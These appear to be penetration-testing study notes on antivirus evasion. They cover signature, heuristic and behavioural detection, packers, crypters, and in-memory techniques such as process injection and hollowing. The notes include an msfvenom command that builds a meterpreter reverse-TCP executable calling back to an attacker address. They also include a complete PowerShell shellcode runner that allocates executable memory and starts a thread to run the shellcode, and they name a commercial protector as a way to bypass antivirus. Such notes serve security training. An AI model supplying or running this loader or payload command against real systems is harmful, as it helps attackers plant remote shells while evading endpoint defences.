Antivirus Evasion

For some practical notes, have a look at Anti-Virus Evasion Techniques

What is Antivirus Software

• It was designed to remediate viruses, but nowadays, it also includes features such as:
  • firewalls
  • website scanners
  • and more

Methods of Detecting Malicious Code

• Let's test:
  • create a standard PE file with a TCP reverse shell payload msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f exe > binary.exe
  • run a virus scan on this exe (upload it to https://www.virustotal.com/gui/home/upload)
  • copy the file to our windows client (see File Transfers)

Detection Methods

• Signature-Based Detection
  • a signature is a continues sequence of bytes in the binary which identifies it
  • This can easily be evaded by adding, removing or replacing a layer of obfuscation or by specifically the modifying the identifying byte sequence
• Heuristic-Based Detection
  • uses rules and algorithms to determine if a action is malicious
  • achieved by stepping through the instruction set of a binary file or by attempting to decompile and then analyse the source code
  • the goal is to look for various patterns and program calls that are considered malicious
• Behavioral-Based Detection
  • dynamically analyses the behaviour of a binary file
  • achieved by executing the file in a emulated environment
  • the goal is to look for behaviours or actions that are considered malicious

Bypassing Antivirus Detection

• Modern techniques try to avoid the disk entirely

On-Disk Evasion

• Packers

  • make a new and smaller binary that is functionally equivalent, but has a completely new structure -> new signature

• Obfuscators

  • reorganize and mutate code, to make it more difficult to reverse engineer
    • replacing instructions with once which essentially do the same
    • adding irrelevant code aka. "dead code"
    • splitting functions/methods
    • reordering functions/methods

• Crypters

  • encrypts the code and adds a decrypting stub which decodes the code on execution
  • the decryption happens In-Memory and only leaves the encrypted code on the disk!

• Software Protectors

  • Anti-Reversing

  • Anti-Debugging

  • Virtual-Machine Emulation detection

  • etc.

  • The Enigma Protector in particular can successfully be used to bypass antivirus products: https://www.enigmaprotector.com/en/home.html

In-Memory Evasion

• Remote Process Memory Injection

  • try to inject the payload into a existing non-malicious PE

  • achieved by using Windows API's

    • use the OpenProcess function to obtain a valid HANDLE to a target process that we have permissions to access
    • allocate memory in the context of that process by calling VirtualAllocEx
    • copy the malicious payload to the newly allocated memory using WriteProcessMemory
    • it is now usually executed in memory in a separate thread using the CreateRemoteThread

  • example:

    $code = '
    [DllImport("kernel32.dll")]
    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    
    [DllImport("kernel32.dll")]
    public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
    
    [DllImport("msvcrt.dll")]
    public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
    
    $winFunc = 
      Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;
    
    [Byte[]];
    [Byte[]]$sc = <place your shellcode here>;
    
    $size = 0x1000;
    
    if ($sc.Length -gt 0x1000) {$size = $sc.Length};
    
    $x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);
    
    for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};
    
    $winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };
    

• Reflective DLL Injection

  • load a dll from memory
  • but windows does not have a native function for this, so an attack must write their own version of the LoadLibrary API, which can load dlls from memory

• Process Hollowing

  • execute a non-malicious process in a suspended state
  • the image of this process is replaced with a malicious executable image
  • the process is resumed and the malicious image is executed

• Inline hooking

  • modify memory
  • add a "hook" (instructions that redirect the code execution), which redirect the code execution into a function, which contains our malicious code
  • upon executing our malicious code, the flow will return back to the modified function and resume execution, appearing as if only the original code had executed

Relevant Note(s):